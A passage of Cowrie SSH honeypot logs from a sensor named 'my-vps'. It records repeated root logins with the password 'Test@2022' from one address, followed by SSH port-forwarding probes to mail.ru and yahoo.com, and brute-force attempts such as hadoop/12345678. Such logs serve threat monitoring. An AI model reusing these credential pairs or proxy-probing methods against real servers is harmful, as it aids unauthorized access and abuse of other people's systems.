ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:40.210244Z","src_ip":"77.83.207.83","session":"d0c38d6e6748"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:40.457624Z","src_ip":"77.83.207.83","session":"d0c38d6e6748"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":22162,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:22162","sensor":"my-vps","timestamp":"2025-08-31T03:44:40.508293Z","session":"d0c38d6e6748"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"12345678","message":"login attempt [hadoop/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T03:44:40.528203Z","src_ip":"212.227.235.229","session":"e92fe1a8dbac"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:40.558164Z","src_ip":"77.83.207.83","session":"d0c38d6e6748"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":23323,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:23323","sensor":"my-vps","timestamp":"2025-08-31T03:44:40.700024Z","session":"d0c38d6e6748"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:40.750543Z","src_ip":"77.83.207.83","session":"d0c38d6e6748"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":27040,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:27040","sensor":"my-vps","timestamp":"2025-08-31T03:44:40.892038Z","session":"d0c38d6e6748"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:40.941693Z","src_ip":"77.83.207.83","session":"d0c38d6e6748"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:40.992439Z","src_ip":"77.83.207.83","session":"d0c38d6e6748"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":44224,"dst_ip":"1.2.3.4","dst_port":22,"session":"d371c12acaa1","protocol":"ssh","message":"New connection: 77.83.207.83:44224 (1.2.3.4:22) [session: d371c12acaa1]","sensor":"my-vps","timestamp":"2025-08-31T03:44:41.042094Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:41.043105Z","src_ip":"77.83.207.83","session":"d371c12acaa1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:41.093200Z","src_ip":"77.83.207.83","session":"d371c12acaa1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:41.343842Z","src_ip":"77.83.207.83","session":"d371c12acaa1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":31756,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:31756","sensor":"my-vps","timestamp":"2025-08-31T03:44:41.395684Z","session":"d371c12acaa1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:41.445879Z","src_ip":"77.83.207.83","session":"d371c12acaa1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":4128,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:4128","sensor":"my-vps","timestamp":"2025-08-31T03:44:41.588538Z","session":"d371c12acaa1"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:41.627894Z","src_ip":"212.227.235.229","session":"e92fe1a8dbac"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:41.638940Z","src_ip":"77.83.207.83","session":"d371c12acaa1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":2470,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:2470","sensor":"my-vps","timestamp":"2025-08-31T03:44:41.780514Z","session":"d371c12acaa1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:41.830785Z","src_ip":"77.83.207.83","session":"d371c12acaa1"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:41.881727Z","src_ip":"77.83.207.83","session":"d371c12acaa1"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":44322,"dst_ip":"1.2.3.4","dst_port":22,"session":"04097b56cadf","protocol":"ssh","message":"New connection: 77.83.207.83:44322 (1.2.3.4:22) [session: 04097b56cadf]","sensor":"my-vps","timestamp":"2025-08-31T03:44:41.931123Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:41.931849Z","src_ip":"77.83.207.83","session":"04097b56cadf"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:41.982412Z","src_ip":"77.83.207.83","session":"04097b56cadf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"17.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 17.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:42.148207Z","src_ip":"212.227.235.229","session":"15cbaeaf80b9"}
{"eventid":"cowrie.session.closed","duration":"163.0","message":"Connection lost after 163.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:42.149393Z","src_ip":"212.227.235.229","session":"15cbaeaf80b9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:42.233857Z","src_ip":"77.83.207.83","session":"04097b56cadf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":17285,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:17285","sensor":"my-vps","timestamp":"2025-08-31T03:44:42.285655Z","session":"04097b56cadf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:42.336043Z","src_ip":"77.83.207.83","session":"04097b56cadf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":11806,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:11806","sensor":"my-vps","timestamp":"2025-08-31T03:44:42.480959Z","session":"04097b56cadf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:42.531412Z","src_ip":"77.83.207.83","session":"04097b56cadf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":3541,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:3541","sensor":"my-vps","timestamp":"2025-08-31T03:44:42.672961Z","session":"04097b56cadf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:42.723839Z","src_ip":"77.83.207.83","session":"04097b56cadf"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:42.775944Z","src_ip":"77.83.207.83","session":"04097b56cadf"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":44393,"dst_ip":"1.2.3.4","dst_port":22,"session":"8020ba0d6727","protocol":"ssh","message":"New connection: 77.83.207.83:44393 (1.2.3.4:22) [session: 8020ba0d6727]","sensor":"my-vps","timestamp":"2025-08-31T03:44:42.824043Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:42.825161Z","src_ip":"77.83.207.83","session":"8020ba0d6727"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:42.875111Z","src_ip":"77.83.207.83","session":"8020ba0d6727"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:43.123196Z","src_ip":"77.83.207.83","session":"8020ba0d6727"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":17085,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:17085","sensor":"my-vps","timestamp":"2025-08-31T03:44:43.173772Z","session":"8020ba0d6727"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:43.223687Z","src_ip":"77.83.207.83","session":"8020ba0d6727"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":2744,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:2744","sensor":"my-vps","timestamp":"2025-08-31T03:44:43.364143Z","session":"8020ba0d6727"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:43.414195Z","src_ip":"77.83.207.83","session":"8020ba0d6727"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":31120,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:31120","sensor":"my-vps","timestamp":"2025-08-31T03:44:43.556548Z","session":"8020ba0d6727"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:43.606769Z","src_ip":"77.83.207.83","session":"8020ba0d6727"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:43.657902Z","src_ip":"77.83.207.83","session":"8020ba0d6727"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":44495,"dst_ip":"1.2.3.4","dst_port":22,"session":"25d64c5d2efd","protocol":"ssh","message":"New connection: 77.83.207.83:44495 (1.2.3.4:22) [session: 25d64c5d2efd]","sensor":"my-vps","timestamp":"2025-08-31T03:44:43.707625Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:43.708805Z","src_ip":"77.83.207.83","session":"25d64c5d2efd"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:43.759518Z","src_ip":"77.83.207.83","session":"25d64c5d2efd"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:44.013054Z","src_ip":"77.83.207.83","session":"25d64c5d2efd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":32463,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:32463","sensor":"my-vps","timestamp":"2025-08-31T03:44:44.064478Z","session":"25d64c5d2efd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:44.115258Z","src_ip":"77.83.207.83","session":"25d64c5d2efd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":20320,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:20320","sensor":"my-vps","timestamp":"2025-08-31T03:44:44.257255Z","session":"25d64c5d2efd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:44.308070Z","src_ip":"77.83.207.83","session":"25d64c5d2efd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":31046,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:31046","sensor":"my-vps","timestamp":"2025-08-31T03:44:44.453065Z","session":"25d64c5d2efd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:44.503770Z","src_ip":"77.83.207.83","session":"25d64c5d2efd"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:44.555326Z","src_ip":"77.83.207.83","session":"25d64c5d2efd"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":44578,"dst_ip":"1.2.3.4","dst_port":22,"session":"50c31a91fa9e","protocol":"ssh","message":"New connection: 77.83.207.83:44578 (1.2.3.4:22) [session: 50c31a91fa9e]","sensor":"my-vps","timestamp":"2025-08-31T03:44:44.607452Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:44.608381Z","src_ip":"77.83.207.83","session":"50c31a91fa9e"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"123456","message":"login attempt [sonar/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:44:44.639138Z","src_ip":"212.227.235.229","session":"bd1015d61d58"}
